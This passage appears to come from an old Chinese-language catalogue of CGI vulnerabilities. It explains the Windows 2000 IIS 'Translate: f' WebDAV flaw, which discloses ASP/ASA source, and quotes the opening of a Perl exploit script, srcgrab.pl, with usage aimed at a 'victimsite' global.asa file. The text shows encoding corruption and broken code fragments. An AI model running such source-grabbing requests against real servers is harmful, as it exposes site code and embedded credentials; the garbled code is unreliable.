|
CGI漏洞(21) char *file;
file = (char *)malloc(250);
strncpy(file,pathtohtwfile,250);
fd = fopen(file,"r";
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}
三十六.Translate:f
在win2000及office 2000(包括FrontPage 2000及FrontPage 2000 server extensions)里的WebDAV存在
着一个安全问题Translate:f。当某人往目标机器的ASP/ASA(或者其它脚本文件)发送包含有"Translate:f"
文件头的HTTP GET请求时,windows2000(没有打过SP1补丁的——现在打补丁的还不是很多吧 会返回
该ASP/ASA的源代码而不是本该返回的经过处理的文件(还需要在url的结尾加上一个特殊字符"/"。 smiler就此漏洞发表了一个用perl写成的利用程序: -----------------------------start-----------------------------------------
-------
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 using
a shared drive but I haven磘 tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG if (not $ARGV[0]) {
print QQ~
Geee it磗 running !! kewl ))
Usage : srcgrab.pl
Example Usage : srcgrab.pl  http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl
| 
